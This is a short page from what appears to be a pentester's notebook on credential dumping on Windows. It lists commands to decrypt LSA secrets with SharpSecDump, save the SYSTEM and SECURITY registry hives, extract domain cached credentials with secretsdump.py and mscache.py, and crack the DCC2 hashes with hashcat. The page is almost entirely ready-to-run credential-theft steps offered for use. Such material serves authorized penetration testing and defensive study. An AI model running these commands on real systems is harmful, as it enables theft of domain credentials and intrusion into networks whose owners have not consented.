Pentester's Promiscuous Notebook

Twitter GitHub Blog

LSA

Local Security Authority

SharpSecDump

Decrypt LSA secrets on target:

PS > Invoke-SharpSecDump -C "-target=127.0.0.1"

MSCash2/MSCache2 (DCC2)

https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-and-cracking-mscash-cached-domain-credentials

Domain cached credentials are stored within LSA secrets in HKLM:\SECURITY registry hive:

Cmd > reg save hklm\system system.hive
Cmd > reg save hklm\security security.hive

secretsdump.py

Export registry hives and extract cached creds locally with secretsdump.py:

$ secretsdump.py -system system.hive -security security.hive LOCAL

mscache.py

https://github.com/QAX-A-Team/mscache/blob/master/mscache.py

Export registry hives and extract cached creds locally with mscache.py:

$ python mscache.py --system system.hive --security security.hive

Crack

$ hashcat -m 2100 -O -a 0 -w 3 --session=dcc2 -o dcc2.out dcc2.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule

Last updated 11 months ago